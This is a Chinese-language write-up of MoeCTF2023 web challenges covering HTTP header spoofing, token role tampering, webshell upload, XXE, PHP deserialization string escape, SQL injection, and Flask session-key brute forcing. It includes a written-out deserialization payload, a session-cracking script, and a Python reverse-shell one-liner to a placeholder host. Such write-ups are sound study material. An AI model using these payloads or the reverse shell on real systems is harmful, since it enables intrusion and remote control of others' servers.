MoeCTF2023 wp--web篇

好久没有用这个，今天记录一下MoeCTF2023的解题记录吧。新生赛，题目难度比较适合入门，各考点也比较清晰，还是不错的。

二、Web

1．http

CHALLENGE: http
DESCRIPTION: 听说这个http里还有个什么东西叫饼干，也不知道是不是吃的

看题目信息，第一眼就是cookie。进入题目看看。

要求：1.get传入UwU=u;

2.post传入Luv=u;

3.用户名是admin；

4.来源是127.0.0.1；

5.使用浏览器是MoeBrowser。

前两个很简单，不用多说。既然要修改流量包，那我们抓包看看。

首先可以看到，这里构造了，get和post的参数。响应提示，第一和第二个已经完成。。。看看图片截图处，guset。很明显，改成admin试试。

okk。第三个完成。第四个，xff即可。

第五个，修改浏览器标识即可。

2．Web入门指北

这个题没有什么好写的，直接在文档内找flag即可。

3．彼岸的fLag

CHALLENGE: 彼岸的flag
DESCRIPTION: 我们在某个平行宇宙中得到了一段moectf群的聊天记录，粗心的出题人在这个聊天平台不小心泄露了自己的flag

提示，看不来什么东西，进入题目看看。

翻了一遍，也没有什么有用的东西。在源代码内，看到flag。PS；我们在做web题的时候，没有思路可以看看源代码有无提示。

4．cookie

CHALLENGE: cookie
DESCRIPTION: **本题无需扫描器/爆破**
hint: readme只是一个样例，不是拿来复制的

题目存在附件，先打开看看。

一个注册和登录的接口文档。获取flag看看。

提示，你必须先登录才可以。

既然有注册接口，那么就先注册一个账号吧。PS：使用附件给的会提示用户存在。

然后在登录看看。

登录成功，给了一个token。先看看能不能拿flag。。PS：这里需要把登录得到的flag放到cookie里。

enmmm。果然flag不是那么好拿的。提示需要admin。。那么再看看给的token

把角色改为admin看看。

okk。拿到flag

5．gas! gas! gas!

CHALLENGE: gas!gas!gas!

DESCRIPTION: Klutton这个假期信心满满地准备把驾照拿下，于是他仔细地学习了好多漂移视频，还准备了这么一个赛博赛车场；诶，不对，开车好像不是用键盘开的？

提示没有发现有效信息。进入题目看看。

给了提示，1，2，3，4.因为要0.5s内完成。所有就写脚本吧。话不多说，上脚本。不知道参数怎么来的，可以先bp抓包就可以得到。

6．moe图床

CHALLENGE: moe图床

DESCRIPTION: 我们准备了一个moe图床用于上传一些图片

hint: 链接难道给的有问题吗0.0?

看提示，没有发现有效信息。打开题目看看。

一个文件上传。先随便传个正常图片看看。

得到一个地址，访问看看咯。PS：这里还泄露一个物理路径。

打开之后，发现还是正常的。enmmm。没有其他问题。。。。。那么回到首页。然后在看看源代码？

这里有个upload.php。访问看看。

哦吼，拿到源代码。审计看看。

ok。他只取第一个后缀。我们构造一下。

插入一句话。将后缀添加.php。。。发现上传成功，访问看看。

成功，现在就找flag就行。

7．了解你的座驾

CHALLENGE: 了解你的座驾

DESCRIPTION: 为了极致地漂移，我们准备了一个网站用于查找你喜欢的车车；听说flag也放在里面了，不过不在网站目录放在根目录应该没问题的吧。。。

看提示，发现flag在根目录。。。。大多数不是都在根目录？

进入题目看看，

enmmm。让我们选车。逛了一下。没有发现点。

查看源代码。

这是啥？xxe？然后在看看流量包。

这不就是xxe嘛。。。试试看。

注意。这里需要url编码。

8．大海捞针

CHALLENGE: 大海捞针

DESCRIPTION: 该死，之前的平行宇宙由于flag的泄露被一股神秘力量抹去，我们脱离了与那个宇宙的连接了！不过不用担心，看起来出题人傻乎乎的是具有泄露flag的概率的，我们只需要连接多个平行宇宙...（难道flag在多元宇宙里是全局变量吗）

tips:仅有这道题要用到扫描器，请不要将爆破速度调整过快，flag是一定能找到的

环境：

http://101.42.178.83:7771/

提示。需要爆破。进题目看看。

提示。id1-1000.那就直接开搞吧。在163时，发现长度变大了。。直接看，拿到flag

9．meo图床

CHALLENGE: meo图床

DESCRIPTION: 我们准备了一个meo(?)图床用于上传一些图片

这个提示，也没有什么东西。看看题目。

还是一个文件上传。会不会和刚才那个一样？

upload.php空白

那就在上传一张照片看看吧。

看看图片。。

这里是用name作为参数传递的。。。试试会不会有任意文件读取。

bp里面在看看。

读取成功。。那么读flag呗。

一个大写的尴尬。。。不过给了一个一个地址。进去看看。。

一眼望去。都不要审计。。。md5绕过。。

10．夺命十三枪

CHALLENGE: 夺命十三枪

DESCRIPTION: 夺命十三枪！然后是啥来着？

看不懂这个提示。那就相当于没有提示吧。。。进入题目看看。

php反序列化的题目。头部文件包含。看看这个文件

存在一个静态引用函数Make_a_Move及str_replace。

str_replace存在反序列化的字符串逃逸

然后我们在重新理一下。目的是在夺命十三枪后面修改为";s:11:"Spear_Owner";s:6:"MaoLei";}，该字符串长度为35，根据代码可以知道"di_qi_qiang" => "Penetrating_Gaze",刚好是从11->16，每次转换可以逃逸5个字符串，只需要重复7次"di_qi_qiang"即可完成逃逸，所以最终payload：?chant=di_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiang";s:11:"Spear_Owner";s:6:"MaoLei";}

11．Signin

CHALLENGE: signin

DESCRIPTION: 真的是signin（

**本题无需扫描器/爆破**

提示，无需扫描爆破。估计有点绕。。。存在一个附件，打开看看。一个py。

最终审计下来，可以利用字符和数字进行绕过，例如username="1" password=1

paylaod = {"username":"1","password":1} 在base64编码5次即可

12．出去旅游的心海

CHALLENGE: 出去旅游的心海

DESCRIPTION: 欢迎来到心海新建的博客！正值假期期间，她抓紧时间出去旅游放松一下，看看她最近都在研究什么？

http://101.42.178.83:7770/

这里有一个sql注入wordpress/wp-content/plugins/visitor-logging/logger.php。。。注意一下时间，随便写一个123就行。然后sqlmap一把梭即可。

13．Moeworld

CHALLENGE: moeworld

DESCRIPTION: 你已经学会了1+1=2，接下来尝试真实的渗透吧~

解压密码为“出去旅游的心海”的flag

根据上一个题目的flag。解压压缩包。得到

访问题目

是一个登录，提示，不用爆破。注册一个账号并登录看看。

第一个提示，secret_key 那应该就是session伪造了。

看看cookie

题目给的secret_key，还差最后4位（不知道为什么是4位的运行一下secret_key的代码）。那就用得到的session去爆破key吧。以下是爆破脚本。

#!/usr/bin/env python3
""" Flask Session Cookie Decoder """
import zlib
from itsdangerous import base64_decode
import ast
import os
from flask.sessions import SecureCookieSessionInterface


class MockApp(object):
    def __init__(self, secret_key):
        self.secret_key = secret_key


class FSCM:
    def encode(secret_key, session_cookie_structure):
        """ Encode a Flask session cookie """
        try:
            app = MockApp(secret_key)

            session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
            si = SecureCookieSessionInterface()
            s = si.get_signing_serializer(app)

            return s.dumps(session_cookie_structure)
        except Exception as e:
            return "[Encoding error] {}".format(e)

    @staticmethod
    def decode(session_cookie_value, secret_key=None):
        try:
            if secret_key is None:
                compressed = False
                payload = session_cookie_value
                if payload.startswith('.'):
                    compressed = True
                    payload = payload[1:]
                data = payload.split(".")[0]
                data = base64_decode(data)
                if compressed:
                    data = zlib.decompress(data)
                return data
            else:
                app = MockApp(secret_key)
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.loads(session_cookie_value)
        except Exception as e:
            return "[Decoding error] {}".format(e)


if __name__ == "__main__":
    cnt = 1
    key = "This-random-secretKey-you-can't-gete9d4"
    # print(FSCM.encode(key,"{'power': 'admin', 'user': 'admin'}"))
    while True:
        cookie_value = 'eyJwb3dlciI6Imd1ZXN0IiwidXNlciI6ImFkbWluMTIzIn0.ZRJTGQ.UYcHGGb1O6nBfbSwzO06vQ7lDco'
        secret_key = "This-random-secretKey-you-can't-get" + os.urandom(2).hex()
        if secret_key:
            result = FSCM.decode(cookie_value, secret_key)
        else:
            result = FSCM.decode(cookie_value)
        cnt += 1
        print(result, cnt)
        if 'power' in result:
            print(result, secret_key, 'YES')
            break

将爆破的key在进行session伪造（将注释的代码解掉，修改key为爆破成功的key即可）。

修改cookie。在访问看看。

这里多了一个提示。访问console看看。

一个命令执行框，反弹shell。

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

在根目录下拿到flag。。。在根据文本提示，打开readme。得到提示。